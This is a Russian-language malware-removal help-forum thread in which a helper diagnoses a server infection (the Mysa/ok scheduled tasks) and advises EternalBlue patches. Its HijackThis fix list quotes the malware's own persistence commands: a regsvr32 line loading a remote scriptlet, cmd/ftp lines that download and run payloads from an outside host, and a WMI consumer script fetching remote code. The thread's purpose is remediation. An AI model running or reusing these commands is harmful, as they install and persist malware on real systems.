Вирус, задачи mysa 1,2,3 и ok

**Fixius** · 29.01.2018, 09:31

Здравствуйте!
В Назначенных заданиях появились задачи Mysa 1, Mysa 2, Mysa 3, ok.
Пока был установлен антивирус ESET NOD32, регулярно получали BSOD, после его удаления нормализовалось, так пропал доступ по сети к этому серверу, хотя пинг по IP и имени есть, с самого сервера на другие машин захожу.
Пробовал восстанавливать сервер (виртуальная машина) из бэкапа за 20.01, сначала всё нормально, потом начинает появляться синий экран и назначенные задания.
Прогонял проверку с загрузочного диска касперского, результаты нулевые, так же и из под винды прошелся касперским и Dr.Web CureIt!, показывают чисто.
Собрал инфу по инструкции

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 29.01.2018, 09:32

Уважаемый(ая) Fixius, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**Vvvyg** · 31.01.2018, 07:06

Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

O4 - MSConfig\startupreg: start [command] = C:\WINDOWS\system32\regsvr32.exe /u /s /i:http://js.5b6b7b.ru:280/v.sct scrobj.dll (HKLM) (2018/01/28)
O22 - Task (Job): Mysa1.job - C:\WINDOWS\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task (Job): Mysa2.job - C:\WINDOWS\system32\cmd.exe /c echo open ftp.ftp0118.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task (Job): Mysa3.job - C:\WINDOWS\system32\cmd.exe /c echo open ftp.ftp0118.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
O22 - Task (Job): ok.job - C:\WINDOWS\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
O25 - WMI Event: [fuckyoumm2_consumer] fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.my0115.ru:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for(1724 bytes)

Устраняйте уязвимость, которую используют в т. ч. нашумевшие шифровальщики WannaCry и Petya? скачайте и установите отсюда:
http://www.catalog.update.microsoft....px?q=KB4012598
Срочно устанавливайте аналогичные патчи на всех компьютерах в сети, иначе не избавитесь от заразы, для новых систем отсюда:
http://www.catalog.update.microsoft....px?q=KB4012212

Проверьте уязвимые компьютеры утилитой ETERNAL BLUES.

Сделайте новый лог такой версией Autologger, Ok после запуска нажимайте с зажатой клавишей Shift.

**Fixius** · 02.02.2018, 09:18

Добрый день!
Все выполнил, вот лог

**Vvvyg** · 02.02.2018, 22:28

Выполните скрипт в AVZ при наличии доступа в интернет:

Код:

var
LogPath : string;
ScriptPath : string;

begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';

  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, прикрепите его к сообщению.

**Fixius** · 08.02.2018, 12:43

Добрый день!
Большое спасибо за помощь, последние рекомендации не стал выполнять, грохнули сервер в итоге.
Перенесли все сервисы на более свежую ОС.

**Vvvyg** · 08.02.2018, 23:05

Только в ней тоже не забудьте все патчи накатить.

Вирус, задачи mysa 1,2,3 и ok (заявка № 217423)

Опции темы